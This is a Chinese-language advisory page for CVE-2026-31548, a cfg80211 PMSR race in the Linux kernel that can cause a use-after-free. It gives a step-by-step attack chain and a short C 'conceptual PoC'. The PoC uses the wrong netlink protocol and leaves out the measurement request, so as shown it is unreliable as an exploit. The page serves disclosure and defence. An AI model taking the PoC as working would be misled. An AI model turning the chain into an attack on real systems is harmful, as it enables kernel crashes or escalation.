CVE-2026-31548 CVSS 7.8 高危

CVE-2026-31548: Linux内核cfg80211竞态条件漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31548

漏洞类型

竞态条件

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核cfg80211组件中存在一个竞态条件漏洞。当发起PMSR请求的nl80211套接字关闭时，系统会异步调度清理工作。如果在清理工作执行前无线接口被拆除，已挂起的工作项可能会在接口移除后仍尝试访问驱动程序回调，导致内核崩溃或未定义行为。

技术细节

该漏洞发生在Linux内核的无线配置管理子系统（cfg80211）。在处理对等测量（PMSR）请求时，如果发起请求的Netlink套接字被关闭，系统会调用`cfg80211_release_pmsr`函数，该函数将请求的nl_portid置零，并调度`pmsr_free_wk`工作队列进行异步的中止处理。然而，如果无线接口在此工作队列执行之前被关闭（例如通过`cfg80211_pmsr_wdev_down`），系统会直接调用`cfg80211_pmsr_process_abort`。关键问题在于，此时并未取消之前已调度但尚未执行的`pmsr_free_wk`。这导致了一个竞态条件：当接口已经被拆除并从驱动中移除后，延迟的`pmsr_free_wk`仍然可能运行并尝试调用驱动的`abort_pmsr`回调函数。由于此时接口指针可能已经无效，这会导致释放后使用（UAF）或空指针解引用，进而引发内核崩溃。

攻击链分析

STEP 1

步骤1

本地低权限用户通过nl80211套接字向无线驱动发起PMSR（对等测量）请求。

STEP 2

步骤2

在请求处理过程中，攻击者关闭发起请求的nl80211套接字，触发cfg80211_release_pmsr函数，该函数调度pmsr_free_wk工作项进行异步清理。

STEP 3

步骤3

攻击者立即触发无线接口的关闭操作（如将接口置为down状态）。

STEP 4

步骤4

cfg80211_pmsr_wdev_down函数直接调用中止流程，而未取消之前挂起的pmsr_free_wk。

STEP 5

步骤5

接口资源被释放后，延迟的pmsr_free_wk开始执行，尝试访问已无效的接口资源，导致内核崩溃或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31548
 * This code attempts to trigger the race condition between
 * PMSR socket closure and interface teardown.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <pthread.h>

#define NETLINK_USER 31

void* teardown_interface(void* arg) {
    // Simulate the interface teardown (wdev down)
    // In a real exploit, this would interact with cfg80211 via ioctl or netlink
    sleep(1); 
    system("ip link set wlan0 down");
    return NULL;
}

int main() {
    int sock_fd;
    struct sockaddr_nl src_addr, dest_addr;
    struct nlmsghdr *nlh = NULL;
    pthread_t tid;

    // 1. Create Netlink socket
    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_USER);
    if (sock_fd < 0) return -1;

    memset(&src_addr, 0, sizeof(src_addr));
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid();

    bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));

    // 2. Send a PMSR request (simplified)
    // Real PoC would construct a valid NL80211_CMD_PEER_MEASUREMENT_START message
    // ... (Message construction omitted) ...

    // 3. Trigger the race
    pthread_create(&tid, NULL, teardown_interface, NULL);

    // 4. Close the socket to trigger cfg80211_release_pmsr and schedule pmsr_free_wk
    close(sock_fd);

    pthread_join(tid, NULL);
    return 0;
}

影响范围

Linux Kernel < 6.9

Linux Kernel < 6.8.10

Linux Kernel < 6.6.32

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议限制对Netlink套接字的非特权访问，或暂时禁用受影响的无线网络接口功能直至应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表